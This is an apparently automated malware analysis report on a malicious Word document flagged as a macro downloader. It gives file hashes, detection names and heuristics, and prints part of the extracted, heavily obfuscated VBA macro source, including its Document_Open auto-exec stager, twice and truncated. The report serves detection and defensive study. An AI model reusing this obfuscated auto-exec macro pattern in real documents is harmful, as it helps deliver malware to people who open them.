Office (OLE) malware analysis — malicious · 4b77d008eae9897e

MALICIOUS

Office (OLE)

184.3 KB Created: 2019-12-13 20:15:00 Authoring application: Microsoft Office Word First seen: 2020-01-07

MD5: 9d3d91b7165adb8f53e702d391bc1fb0 SHA-1: 170b24651912a794128126c5fde81309e77febdc SHA-256: 4b77d008eae9897ea980d68abf2424a6fb9fdee29ee600ac19721015bb30db83

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing a VBA macro that is automatically executed upon opening, as indicated by the Document_Open macro and CreateObject heuristics. The macro appears to be a command stager, likely designed to download and execute a secondary payload. The ClamAV detection of 'Doc.Downloader.Sagent-7454029-0' further supports its downloader functionality.

Heuristics 7

ClamAV: Doc.Downloader.Sagent-7454029-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sagent-7454029-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10966 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10966 bytes
SHA-256: `8b140e455a34f8aa92109811060058b938672f863f8a9ca7d458fa6e659b1eb2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Wvmalqaed" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "Xafmjubswzkvh, 0, 0, MSForms, TextBox" Private Sub Document_open() Lhzuefqeoualy = Jjtcjzakdxoxc Datpclovfiq = Qgcluecuhva Xwxqhnvbqa = Eounnutomt Select _ Case Ddxgtvesrsns Case 972 Adqmzglbqqh _ = Hex _ (814) Bhjxdzdmepoi = CVar(207) Yrmacqytpxau _ = Hex(699) Case 872 Bnhymbdliu = CVar(368) Ucwnbefkmkdq _ = 488 Vhrlxjiulri = CDate _ (108) Case 538 Ssnjrqjvwxcw = _ CInt(932) Gwrjqtvgvtw = Log(Kaqefmim) Alavvzkppcucx = Rvzmwunvp End Select Ngpafhkxkn = Vfbdtvztvff Xprjuzujjgvrg = Buantyxyqiux Nibtdhstnpnre = Fmnzgraescxzq Select _ Case Ackkwyuy Case 640 Aigkzcumzkv _ = Hex _ (769) Dhndiqfhbrmpl = CVar(46) Palokkgjuuta _ = Hex(627) Case 729 Rrftegcjumh = CVar(633) Yquuouzwy _ = 751 Wnxysjpqc = CDate _ (161) Case 460 Agwgasgfyg = _ CInt(46) Itzzffer = Log(Xwrjeqlxqumo) Yhugpsaajjp = Jjkydrjjzpro End Select Fhlatmzc = Hruzpaapt Exmdazpkort = Xufldbzw Tpbiqnswrjm = Ywtnjsloop Select _ Case Vuomsxto Case 274 Oyrzwwubsrwk _ = Hex _ (529) Koqeezezlfu = CVar(765) Kzlslafh _ = Hex(216) Case 197 Kvotmxzglnybe = CVar(927) Kjopnledskc _ = 403 Kkbiprfiqgscl = CDate _ (830) Case 298 Gfivecbqqs = _ CInt(292) Fsvjkrzwal = Log(Mbhudwmbmv) Bgcwitlpiha = Wikldiupwjcv End Select Mybqpirouq End Sub Attribute VB_Name = "Kopbukxsd" Attribute VB_Base = "0{B641B2EB-DC93-416B-BEA6-8182BA37ABEF}{EC934842-EAC4-4E0F-ABBD-E9134B1B0760}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Yjnrqrtuutmgd" Function Jxohkkahqtvg() Tlikltzxt = Gourbdmzhh Kxuipgvqwxhvm = Qmpdrdxkkbtvi Yzolynrkjr = Pigyfrevm Select _ Case Nwnmjhvk Case 806 Mzhhallzcf _ = Hex _ (98) Vhbdcoedixgw = CVar(352) Kahcoglwdjy _ = Hex(160) Case 21 Ftvjlqtbf = CVar(845) Eggkdoslf _ = 826 Lsarghye = CDate _ (469) Case 173 Ljzkmnvfh = _ CInt(871) Pbxhzbtor = Log(Uehdjujmca) Txhzqaxf = Wvqcjggfqarzo End Select Zxwqjvefztk = Wvmalqaed.Xafmjubswzkvh Hszgkzgq = Xvyozibhmikb Ezpedqvnrrdhg = Rqiytsrxul Nuepfqbbkkcmw = Dhkrbdwvrc Select _ Case Encvsxris Case 868 Xqfvzgov _ = Hex _ (594) Ioqjufuqzmmc = CVar(837) Oipjpfrrpfmaw _ = Hex(557) Case 339 Ocgbnwzllxrwr = CVar(569) Ovhhgqre _ = 922 Crykwujmtkkgb = CDate _ (89) Case 527 Pwdlxizx = _ CInt(903) Rsobfxxaeke = Log(Odikxjqi) Grtotiocuk = Culnnmfxk End Select Qaaydpknm = Zxwqjvefztk + Kopbukxsd.Oudrjneamo + Kopbukxsd.Liivbpuc + Kopbukxsd.Ubrfolzplf Btripuhispsn = Qiwiwteeaa Vpkfzgeosehyo = Sklfuwkxhcp Pxsrxpyrynp = Gumbxuofmt Select _ Case Pclsdckaoyvl Case 998 Ykwtxvtl _ = Hex _ (906) Lffurkdddwi = CVar(187) Zvkeluhzblw _ = Hex(442) Case 57 Jswtbdmv = CVar(840) Xqjevrhtslwwy _ = 822 Hrjrjujzmak = CDate _ (773) C ... (truncated)

SHA-256: 8b140e455a34f8aa92109811060058b938672f863f8a9ca7d458fa6e659b1eb2

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Wvmalqaed"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Xafmjubswzkvh, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Lhzuefqeoualy = Jjtcjzakdxoxc
Datpclovfiq = Qgcluecuhva
Xwxqhnvbqa = Eounnutomt
Select _
 Case Ddxgtvesrsns
      Case 972
         Adqmzglbqqh _
         = Hex _
         (814)
         Bhjxdzdmepoi = CVar(207)
         Yrmacqytpxau _
         = Hex(699)
      Case 872
         Bnhymbdliu = CVar(368)
         Ucwnbefkmkdq _
         = 488
         Vhrlxjiulri = CDate _
         (108)
      Case 538
         Ssnjrqjvwxcw = _
         CInt(932)
         Gwrjqtvgvtw = Log(Kaqefmim)
         Alavvzkppcucx = Rvzmwunvp
End Select
   Ngpafhkxkn = Vfbdtvztvff
Xprjuzujjgvrg = Buantyxyqiux
Nibtdhstnpnre = Fmnzgraescxzq
Select _
 Case Ackkwyuy
      Case 640
         Aigkzcumzkv _
         = Hex _
         (769)
         Dhndiqfhbrmpl = CVar(46)
         Palokkgjuuta _
         = Hex(627)
      Case 729
         Rrftegcjumh = CVar(633)
         Yquuouzwy _
         = 751
         Wnxysjpqc = CDate _
         (161)
      Case 460
         Agwgasgfyg = _
         CInt(46)
         Itzzffer = Log(Xwrjeqlxqumo)
         Yhugpsaajjp = Jjkydrjjzpro
End Select
   Fhlatmzc = Hruzpaapt
Exmdazpkort = Xufldbzw
Tpbiqnswrjm = Ywtnjsloop
Select _
 Case Vuomsxto
      Case 274
         Oyrzwwubsrwk _
         = Hex _
         (529)
         Koqeezezlfu = CVar(765)
         Kzlslafh _
         = Hex(216)
      Case 197
         Kvotmxzglnybe = CVar(927)
         Kjopnledskc _
         = 403
         Kkbiprfiqgscl = CDate _
         (830)
      Case 298
         Gfivecbqqs = _
         CInt(292)
         Fsvjkrzwal = Log(Mbhudwmbmv)
         Bgcwitlpiha = Wikldiupwjcv
End Select
Mybqpirouq
End Sub


Attribute VB_Name = "Kopbukxsd"
Attribute VB_Base = "0{B641B2EB-DC93-416B-BEA6-8182BA37ABEF}{EC934842-EAC4-4E0F-ABBD-E9134B1B0760}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Yjnrqrtuutmgd"
Function Jxohkkahqtvg()
   Tlikltzxt = Gourbdmzhh
Kxuipgvqwxhvm = Qmpdrdxkkbtvi
Yzolynrkjr = Pigyfrevm
Select _
 Case Nwnmjhvk
      Case 806
         Mzhhallzcf _
         = Hex _
         (98)
         Vhbdcoedixgw = CVar(352)
         Kahcoglwdjy _
         = Hex(160)
      Case 21
         Ftvjlqtbf = CVar(845)
         Eggkdoslf _
         = 826
         Lsarghye = CDate _
         (469)
      Case 173
         Ljzkmnvfh = _
         CInt(871)
         Pbxhzbtor = Log(Uehdjujmca)
         Txhzqaxf = Wvqcjggfqarzo
End Select
Zxwqjvefztk = Wvmalqaed.Xafmjubswzkvh
   Hszgkzgq = Xvyozibhmikb
Ezpedqvnrrdhg = Rqiytsrxul
Nuepfqbbkkcmw = Dhkrbdwvrc
Select _
 Case Encvsxris
      Case 868
         Xqfvzgov _
         = Hex _
         (594)
         Ioqjufuqzmmc = CVar(837)
         Oipjpfrrpfmaw _
         = Hex(557)
      Case 339
         Ocgbnwzllxrwr = CVar(569)
         Ovhhgqre _
         = 922
         Crykwujmtkkgb = CDate _
         (89)
      Case 527
         Pwdlxizx = _
         CInt(903)
         Rsobfxxaeke = Log(Odikxjqi)
         Grtotiocuk = Culnnmfxk
End Select
Qaaydpknm = Zxwqjvefztk + Kopbukxsd.Oudrjneamo + Kopbukxsd.Liivbpuc + Kopbukxsd.Ubrfolzplf
   Btripuhispsn = Qiwiwteeaa
Vpkfzgeosehyo = Sklfuwkxhcp
Pxsrxpyrynp = Gumbxuofmt
Select _
 Case Pclsdckaoyvl
      Case 998
         Ykwtxvtl _
         = Hex _
         (906)
         Lffurkdddwi = CVar(187)
         Zvkeluhzblw _
         = Hex(442)
      Case 57
         Jswtbdmv = CVar(840)
         Xqjevrhtslwwy _
         = 822
         Hrjrjujzmak = CDate _
         (773)
      C
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.